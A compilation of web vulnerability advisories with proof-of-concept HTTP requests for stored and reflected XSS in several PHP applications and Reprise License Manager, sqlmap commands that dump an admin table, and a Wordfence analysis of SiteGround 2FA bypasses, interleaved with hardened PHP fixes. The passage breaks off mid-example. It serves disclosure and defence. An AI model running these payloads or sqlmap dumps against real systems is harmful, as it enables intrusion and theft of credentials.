<pre><code># sms-Add_Student-Stored_XSS-POC<br /># Author: D4rkP0w4r <br /><br />Description => Stored_XSS at Add Student<br /><br /># Steps to Reproduce<br />* Login to admin -> Students -> Add Student -> input payload <img/src/onerror=prompt(10)> at Enter Name<br /><br /># Exploit<br />* Input payload at Enter Name -> click Add Students -> access All Student -> The XSS will trigger<br />* Log out of admin and type the roll number -> The XSS will trigger<br /><br /># Vulnerable Code<br />* When inserting into the database, the input is not filtered for special characters<br /><br /># POC <br />* Injection Point <br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="name"<br /><br /><img/src/onerror=prompt(10)><br /><br />* Request<br /><br />POST /sms/admin/addstudent.php HTTP/1.1<br />Host: localhost:8080<br />Content-Length: 992<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost:8080<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost:8080/sms/admin/addstudent.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k<br />Connection: close<br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="image"; filename="car.png"<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="rollno"<br /><br />1234567<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="name"<br /><br /><img/src/onerror=prompt(10)><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="contact"<br /><br />123456<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="standerd"<br /><br />1<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="city"<br /><br />Newyork<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="email"<br /><br />haha@gmail.com<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="gender"<br /><br />male<br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K<br />Content-Disposition: form-data; name="submit"<br /><br /><br />------WebKitFormBoundaryAvKt9LM2RnnkuA0K--<br /><br /></code></pre>
<pre><code># AeroCMS-Comment-Stored_XSS-POC<br /># Author: D4rkP0w4r <br />* Note => No registration or login is required <br />* Description => Stored_XSS at comment box<br /><br />## Steps to Reproduce<br />* Click Read More -> input payload <img/src/onerror=prompt(10)> at Author -> click Submit button <br /><br /># Exploit<br />* Input payload at Author -> click Submit button<br />* When the admin logs in to the admin panel and clicks Comments -> The XSS will trigger <br />* Finally, Success !!!!<br /><br /># Vulnerable Code<br />* view_all_comments.php<br />* Stored XSS in the comment section<br />* Impact: cookie theft and JavaScript execution in the admin panel, because comments are displayed in the admin panel<br />* post.php<br />* No encoding is implemented when inserting data into the database<br /><br /># POC<br />* Injection Point <br />comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=<br /><br />* Request<br />POST /AeroCMS/post.php?p_id=36 HTTP/1.1<br />Host: localhost:8080<br />Content-Length: 126<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost:8080<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost:8080/AeroCMS/post.php?p_id=36<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=loqbt1ibs376hge1s415srq441<br />Connection: close<br /><br />comment_author=%3Cimg%2Fsrc%2Fonerror%3Dprompt%2810%29%3E&comment_email=bin%40gmail.com&comment_content=hacked&create_comment=<br /><br />POC VIDEO https://drive.google.com/file/d/1GxOyX1JkG0trfdaCLfe06TR6WLIGoUXE/view?usp=sharing<br /><br />----<br /><br /># AeroCMS-Add_Posts-Stored_XSS-Poc<br />* Description => Stored_XSS at Post Title<br /><br />## Steps to Reproduce<br />* Login to admin panel -> Posts -> Add Posts -> Post Title -> inject payload <img/src/onerror=prompt(10)> -> The XSS will trigger when the Edit Post button is clicked<br /><br />## Vulnerable Code<br />* add_post.php<br />When inserting into the database, the input is not filtered for HTML characters<br />* post.php<br />Even when displaying, entities are not properly encoded<br />-------------------------------------------------------------<br /># POC<br />* Injection Point<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_title"<br /><br /><img/src/onerror=prompt(10)><br /><br />* Request<br />POST http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26 HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------85448121341942511952219062291<br />Content-Length: 1101<br />Origin: http://localhost:8080<br />Connection: keep-alive<br />Referer: http://localhost:8080/AeroCMS/admin/posts.php?source=edit_post&p_id=26<br />Cookie: Phpstorm-6b6ba5ee=79a50460-3b02-4cde-a5a4-ff6883c16a7b; PHPSESSID=ndh6ks953tmha1ps8cfp4bplf2<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_title"<br /><br /><img/src/onerror=prompt(10)><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_category_id"<br /><br />1<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_user"<br /><br />admin<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_status"<br /><br />published<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="image"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_tags"<br /><br />1<br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="post_content"<br /><br /><p>111</p><br />-----------------------------85448121341942511952219062291<br />Content-Disposition: form-data; name="update_post"<br /><br />Edit Post<br />-----------------------------85448121341942511952219062291--<br /><br /><br />POC VIDEO<br />https://drive.google.com/file/d/1kMGPBLKgefvKZj34QxDlPTxXdcT0kRR_/view?usp=sharing<br /></code></pre>
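The sms Add Student and AeroCMS comment/post-title advisories above all report the same defect: a value is stored as submitted and later written into an admin page without HTML encoding. The following is an added example, not code from either project, showing the vulnerable rendering beside a hardened one. The rows are constructed and stand in for the database; the `e()` helper is an assumption, not an API of either application.

```php
<?php
// Added example, not code from the sms or AeroCMS projects: the stored-XSS defect the
// advisories above describe, shown as a vulnerable renderer beside a hardened one.
// The rows below are constructed and stand in for the database tables.
declare(strict_types=1);

// Constructed rows, stored exactly as submitted (as both applications do).
const SAMPLE_ROWS = [
    ['name' => 'Alice Example',                'rollno' => '1234567'],
    ['name' => '<img/src/onerror=prompt(10)>', 'rollno' => '7654321'],
];

// VULNERABLE: database values are interpolated straight into the HTML response,
// which is how the "All Student" and view_all_comments.php pages end up executing
// whatever was stored.
function renderRowsVulnerable(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= "<tr><td>{$row['name']}</td><td>{$row['rollno']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Encode for an HTML text or attribute context. ENT_QUOTES covers both quote
// characters, so the helper is also safe inside single- and double-quoted attributes.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// HARDENED: every untrusted value is encoded at the point of output. Encoding on
// output, rather than stripping "bad characters" on insert, keeps the stored data
// intact and protects every page that renders it, not only the one that was tested.
function renderRowsHardened(array $rows): string
{
    $html = "<table>\n";
    foreach ($rows as $row) {
        $html .= '<tr><td>' . e($row['name']) . '</td><td>' . e($row['rollno']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Defender-side check: does any stored value containing '<' appear verbatim in the page?
function leaksRawMarkup(string $html, array $rows): bool
{
    foreach ($rows as $row) {
        foreach ($row as $value) {
            if (str_contains($value, '<') && str_contains($html, $value)) {
                return true;
            }
        }
    }
    return false;
}

$vulnerable = renderRowsVulnerable(SAMPLE_ROWS);
$hardened   = renderRowsHardened(SAMPLE_ROWS);
var_dump(leaksRawMarkup($vulnerable, SAMPLE_ROWS));
var_dump(leaksRawMarkup($hardened, SAMPLE_ROWS));
echo $hardened;
```

Run with PHP 8 (`str_contains` is new in 8.0). The check reports the vulnerable page as leaking live markup and the hardened page as clean: in the hardened table the stored value appears only as the inert text `&lt;img/src/onerror=prompt(10)&gt;`, so neither the admin list nor the roll-number lookup executes it.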
<pre><code># Zoo Management System SQL Injection<br /># Author: D4rkP0w4r <br />* Description => SQL injection at /animals?class_id=1<br />* Injection Point<br /><br />http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1<br /><br /># Exploit <br />* Exploit with Sqlmap<br />python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --dbs<br /><br />python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --tables -D zoomanagement<br /><br />python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --columns -D zoomanagement -T admin --dump<br /><br /># Vulnerable Code<br /><br />* `class_id` is not filtered before it is passed to the database<br /><br /></code></pre>
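The advisory above reports that `class_id` reaches the database unfiltered. As an added example (not the Zoo Management System's own code), the lookup is shown below first in the injectable shape and then with integer validation plus a prepared statement. The table and column names, and the in-memory SQLite database (requires the `pdo_sqlite` extension), are assumptions made so the example runs offline.

```php
<?php
// Added example, not code from the Zoo Management System: the class_id lookup
// described above, first as an injectable query and then validated and parameterised.
// Table/column names are assumptions; the SQLite database is constructed in memory.
declare(strict_types=1);

function buildSampleDb(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE animals (id INTEGER PRIMARY KEY, class_id INTEGER, name TEXT)');
    $pdo->exec("INSERT INTO animals (class_id, name) VALUES (1, 'Lion'), (1, 'Tiger'), (2, 'Eagle')");
    return $pdo;
}

// VULNERABLE: the SQL text is built from the raw request parameter, which is the
// defect the advisory reports (no filtering of class_id).
function animalsByClassVulnerable(PDO $pdo, string $classId): array
{
    $sql = "SELECT name FROM animals WHERE class_id = $classId";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// HARDENED: reject anything that is not a positive integer, then bind the value as
// a parameter so it can never become part of the SQL text.
function animalsByClassHardened(PDO $pdo, string $classId): array
{
    $id = filter_var($classId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('class_id must be a positive integer');
    }
    $stmt = $pdo->prepare('SELECT name FROM animals WHERE class_id = :class_id');
    $stmt->bindValue(':class_id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = buildSampleDb();

// A well-formed request behaves identically in both versions.
print_r(animalsByClassVulnerable($pdo, '1'));
print_r(animalsByClassHardened($pdo, '1'));

// A constructed tautology appended to the parameter widens the vulnerable query to
// every row; the hardened version refuses the value before any SQL is built.
$tampered = '1 OR 1=1';
print_r(animalsByClassVulnerable($pdo, $tampered));
try {
    animalsByClassHardened($pdo, $tampered);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Validation and parameterisation are both kept on purpose: the prepared statement alone already prevents injection, while the integer check gives the application a clean place to log and reject malformed input, which is also where detection of probing such as the sqlmap run above belongs.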
<pre><code>Multiple Vulnerabilities in Reprise License Manager 14.2<br /><br />Credit: Giulia Melotti Garibaldi<br /><br />//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2022-28363<br /># Vulnerability Title: Reflected Cross-Site Scripting<br /># Severity: Medium<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-03-29<br />#<br />#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 38<br />Origin: http://HOST:5054<br />Connection: keep-alive<br />Referer: http://HOST:5054/goform/login_process<br /><br /><br /><br /><br /><br />/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2022-28364<br /># Vulnerability Title: Authenticated Reflected Cross-Site Scripting<br /># Severity: Low<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-03-29<br />#<br 
/>#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Content-Type: application/x-www-form-urlencoded<br />Origin: http://HOST:5054<br />Connection: keep-alive<br />Referer: http://HOST:5054/goforms/rlmswitchr<br />Cookie: REDACTED<br /><br /><br /><br /><br />/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /># Product: RLM 14.2<br /># Vendor: Reprise Software<br /># CVE ID: CVE-2022-28365<br /># Vulnerability Title: Unauthenticated Information Disclosure<br /># Severity: Low<br /># Author(s): Giulia Melotti Garibaldi<br /># Date: 2022-03-29<br />#<br />#############################################################<br />Introduction:<br />Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. 
No authentication is required.<br />The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.<br /><br />Vulnerability PoC:<br /><br />GET http://HOST:5054/goforms/rlminfo HTTP/1.1<br />Host: HOST:5054<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Connection: keep-alive<br />Content-Length: 0<br /><br /><br /><br />//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////<br /><br /></code></pre>
<pre><code>Description: Authentication Bypass via 2-Factor Authentication Setup<br /><br />Affected Plugin: SiteGround Security<br /><br />Plugin Slug: sg-security<br /><br />Plugin Developer: SiteGround<br /><br />Affected Versions: <= 1.2.5<br /><br />CVE ID: CVE-2022-0992<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: 1.2.6<br /><br />SiteGround Security is a plugin designed to enhance the security of WordPress installations via several features like login security including 2FA, general WordPress hardening, activity monitoring, and more. It’s also worth noting that it comes pre-installed on all SiteGround hosted WordPress sites. Unfortunately, the 2FA functionality of the plugin was insecurely implemented, making it possible for unauthenticated attackers to gain access to privileged accounts.<br /><br />When two-factor authentication is enabled, it requires all administrative and editor users to set up two-factor authentication. This requirement is triggered when the site's administrative and editor users log into the site for the first time after 2FA has been enabled, at which time they are prompted to configure 2FA for their account. This means that there will be a period of time between 2FA being enabled on a site and each user configuring it for their account.<br /><br />During this interim period, attackers could hijack the 2FA set-up process. 
The plugin had a flaw that let attackers completely bypass the first step of authentication, which requires a username and password, and access the 2FA set-up page for users that had not configured 2FA yet.<br /><br />It was as simple as supplying the user ID they would like to compromise via the sg-user-id parameter, along with a few other parameters to indicate that they would like to trigger the initial 2FA configuration process.<br /><br />The following validate_2fa_login() function shows the process by which a user-supplied ID is validated. If the results from the check_authentication_code() function and the sg_security_2fa_configured user meta returned false, which indicated that 2FA hadn’t yet been configured for that user, then the plugin would load the 2fa-initial-setup-form.php template, which displays the QR code and 2FA secret needed to configure the authenticator app for the user-supplied ID.<br /><br />[Please view the code snippet on our blog here. (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) ]<br /><br />2FA-Initial Setup 
(https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 )<br /><br />The returned QR code and secret key are the only things needed to connect the user account with an authentication mechanism, such as Google Authenticator. Attackers were able to use this to connect their authentication app with the account and successfully use a code to pass the “second factor of authentication.” This function would then set the user authentication cookies via the wp_set_auth_cookie() function using the user supplied ID from the sg-user-id parameter which effectively logs the attacker in as that user. Due to the default configuration of the plugin, this account would most likely be a privileged user like an administrator or editor. It’s also worth noting that the function returns the back-up codes which could be used via the weakness outlined in the next section.<br /><br />To sum it up, there was no validation on the validate_2fa_login() function that the identity a user was claiming was in fact legitimate. As such attackers could bypass the first authentication mechanism, a username/password pair, which is meant to prove identity and successfully log in, due to a weakness in the second authentication mechanism, the 2FA process. 
When successful, an attacker could completely infect a site by exploiting this vulnerability.<br /><br />Description: Authorization Weakness to Authentication Bypass via 2-Factor Authentication Back-up Codes<br /><br />Affected Plugin: SiteGround Security<br /><br />Plugin Slug: sg-security<br /><br />Plugin Developer: SiteGround<br /><br />Affected Versions: <= 1.2.4<br /><br />CVE ID: CVE-2022-0993<br /><br />CVSS Score: 8.1 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Chloe Chamberland<br /><br />Fully Patched Version: 1.2.6<br /><br />In addition to the above-outlined vulnerability, the method in which 2FA back-up code authentication was handled made it possible for attackers to log in if they were able to brute force a back-up code for a user or compromise it via other means such as SQL Injection.<br /><br />Diving deeper, the plugin registered the validate_2fabc_login() function, which validated the supplied backup code through the validate_backup_login() function using the user-supplied user ID from the sg-user-id parameter along with the back-up code supplied via the sgc2fabackupcode parameter. If the back-up code was found in the array of stored back-up codes for that user, then the function would use the wp_set_auth_cookie() function to set the authentication cookies for the supplied user ID. If that user ID belonged to an administrator, the attacker would effectively be logged in as an administrator.<br /><br />[Please view the code snippet on our blog here. 
(https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP5V5js6pV3Zsc37CgZbDW5wrR-w7zY7KhW4Mrm4c5Zy32dW8XHhsP3P3WvbW1y7vnb2Lz_yCW3h74mS5vGQlSW1TtcL79kYcBBW6cPLyq42thMcW6CwF5w64p8MWW8SMZYL7Ry-RVW72ZMh97N4zYLW6GgBkG2wR-9mW7-b3XP3BhX0qVFdjjZ7wRBZ1W41BHlZ7HXk4_W8gYcdC6jDCSYW7WrVW87zzlt6N3b84wQv3fMrW80zd5s8mFpr_W51NSZ988d_tMN3fRrg4mwDrfW6wrQ9H20MzKyW5chZKt59ZMQgW3mYpHp6XGDWWW81vjKm3DmQR9W86m5dc4X9LfMW3xYLTr441yX1W7x5YyR2gML9GW2ByWtF3NzNmzVGmQWX7Syqr9W7pfbrH7-fqv_W8sJj6l6JnsplW65b1k86jYkVB36K61 ) ]<br /><br />Similarly to the previous vulnerability, the issue here is that there was no true identity validation for the authentication, which indicates an authorization weakness. The function performed no checks to verify that a user had previously authenticated prior to entering the 2FA back-up code, and as such they did not need to legitimately log in prior to being logged in while using a back-up code. This meant that there were no checks to validate that a user was authorized to use a back-up code to perform the second factor of authentication that would log them in.<br /><br />Though the risk in this case is lower, the backup codes were 8 digits long and entirely numeric, so an attacker could potentially brute force one of the 8 back-up codes and automatically be logged in without knowing a username and password combination for an administrative user.<br /><br />While this might not be practical to attempt on most servers, a patient adversary attacking a well-provisioned server capable of processing a large number of requests at once would have a high chance of eventually gaining access unless the brute force attempts were stopped by another mechanism, such as the Wordfence plugin’s built-in brute force protection or rate limiting rules.<br /><br />Further, this vulnerability could be used in conjunction with another vulnerability, such as SQL injection, where an attacker would be able to compromise the 2FA back-up codes that are 
stored in the database and then use them to log in without needing to crack the password of an administrative user, which would likely be significantly stronger. In both cases, the impact would be significant as an attacker could gain administrative access to the compromised WordPress site, which could be used for complete site infection.<br /><br />An Important Security Reminder: Audit Your WordPress Site's User Accounts<br /><br />This vulnerability serves as an important reminder to audit your WordPress site's user accounts. This means identifying any old and unused user accounts that have been inactive for an extended period of time and/or are likely to never be used again, and removing them or completely stripping the user's capabilities. This vulnerability could easily be exploited on sites where the site owner enabled 2FA, which is required for all administrative and editor users, and had old inactive administrative/editor user accounts on the site that an attacker could target. Considering that accounts that are no longer active are unlikely to log in after the 2FA setting has been enabled, the 2FA for those accounts would not be configured, leaving the site ripe for exploitation by any attackers exploiting the vulnerability.<br /><br />A similar security issue involving insecure 2FA was reported by CISA in conjunction with the FBI a few weeks ago (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP6N3kWF5V1-WJV7Cg-j9W3-nvtq4C7KHBW40PfMb4MYPJbW1Q5kSc6V4L5qW6KLQRC2q1f1GW1sJ8Sc8FpjgyVMxbKf8wRgS5W7SJm5X3BMZ7pW7c1gB85kW6R5W7_1vH12JVyxfW2bvpn47y1jCwW4bGJCj8Yr_J9W6G15j12562xnW1JGqmS9htnJ4W92Hm456nf8mmW5HYmmj8PQ_-XN6yRnxTWHvr1W2Rcg0C9bjZbQVldvV225B_SNVn14Rz8yQJNNW9361-n6Z0KSqW7qysVm5djVCLW7S8dFb3p268N35ns1 ) , around the same time we discovered this vulnerability. 
In the Cybersecurity Advisory (CSA) by the CISA, it was disclosed that a threat actor was able to successfully brute force a dormant user's account credentials, and due to a default 2FA setting that would allow dormant users to re-enroll a new device for 2FA during the next active log in, the threat actor was able to connect the 2FA secret to their own account and retrieve the code needed to pass the second factor of authentication. Once the threat actor gained initial access to the system they were able to escalate their privileges by exploiting the “PrintNightmare” vulnerability, which you can read more about here (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP7Z3kWGhV1-WJV7CgB7nVd4Vn790XT8mW5fLrl94CwHLyN4SY-BCgMPx2W2J0HKM95hFGZW5kH7TY8xmV9XW3cvgng2RnjHgW3WnWKM11J-SYMMsWWClb6SsN7tCYmV8HVLWW94cbjz2Y59FZW3m_y6X3frj2NW2qylmN1v_rd3W7G52q37Z04l1W358br17nn8CKN2WZXm3WsfBMW7Q0j7B62HsDkW1c91Wl13XylvW4K2Z2j4pFcsrW69shJz7SLQqtW56-6sG22ZvKzW4-wHXt2r-t_JN8lF8ZMCw9ryW3Cp1M85939QWW5kcNj98w0_VSW1gjfmD2sHZcMVPGSHC7_28pwW1GTLkd82-ytmW973xZ_5mvdNmW5Y0pyZ2YkCrLW31vbQf1Gn9hY36mT1 ) , and steal sensitive information from across the organization's network. This goes to show that attackers are definitely looking for flaws like the one disclosed today to exploit and any site can be a target. As such, it's important to actively maintain and validate the security of your site through regularly performed professional or self-conducted security audits and penetration tests, which is a service Wordfence provides (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVv8XH4Dtx6JW4ZScBw4MDnfnW7TctdS4HBVbXN3rtP6N3kWF5V1-WJV7Cg-S6W7JPXRK7CbvvTW79tFY751pMcjN6MxMTf2wTd6W80YKYD36-Z5NMnKkDHfsZtmN23Pf3-Xvb1GN6yHj8fHYYYRW9cdrHs11b_2pW6_-ZSP1JQZ_PW8DVt5k5JYlK4W3BKzMg6Ch8PmW6bKv4s6Q5PJ8W66Hj7T3cdzDZW5QQjDC9k9mhLW5zbDpn70cpTTW3g6Cy75Ndf9yW4LXgkz17NVxhW4l0Qhz3KwfjkW7SDrh888kb4HW2N_kfl61WZK2W4v5s3z8BJz6LW4q2d0j359Lnj36-C1 ) . 
Security is an active and continuous process.<br /><br />Timeline<br /><br />March 10, 2022 – Conclusion of the plugin analysis that led to the discovery of two Authentication Bypass Vulnerabilities in the “SiteGround Security” WordPress plugin. We deploy firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response users. We send the full disclosure details to SiteGround in accordance with their responsible disclosure policy.<br /><br />March 11, 2022 – The CTO of SiteGround responds indicating that a patch has been released. We review the patch and inform them that it is insufficient. They release an additional patch.<br /><br />March 11, 2022 – A patched version of the plugin is released as version 1.2.3. We suggest further security enhancements to the functionality.<br /><br />March 16, 2022 – An update is made that reduces the security of the 2FA functionality; we follow up again to suggest better security enhancements to the functionality. The CTO assures us that they are working on it.<br /><br />April 7, 2022 – A fully and optimally patched version of the plugin is released as version 1.2.6.<br /><br />April 9, 2022 – Wordfence Free users receive the firewall rules.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “SiteGround Security” plugin that made it possible for unauthenticated attackers to gain access to administrative user accounts in instances where 2-Factor Authentication was enabled, though not yet fully set up, and in cases where an attacker could successfully brute force a back-up code. This could easily be used by an attacker to completely compromise a site. These flaws have been fully patched in version 1.2.6.<br /><br />We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.<br /></code></pre>
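Both SiteGround Security weaknesses above come down to one missing link: the second-factor steps trusted a request-supplied user ID instead of a user whose password had already been verified. The following is an added example, not the plugin's code, of a minimal flow that creates a server-side pending-login record only after the password check and makes both the initial 2FA setup and the backup-code path depend on it. `$SESSION` stands in for `$_SESSION`, `setAuthCookie()` for `wp_set_auth_cookie()`, and the user record, attempt limit and hex secret are constructed assumptions.

```php
<?php
// Added example, not the SiteGround Security plugin's code: a minimal second-factor
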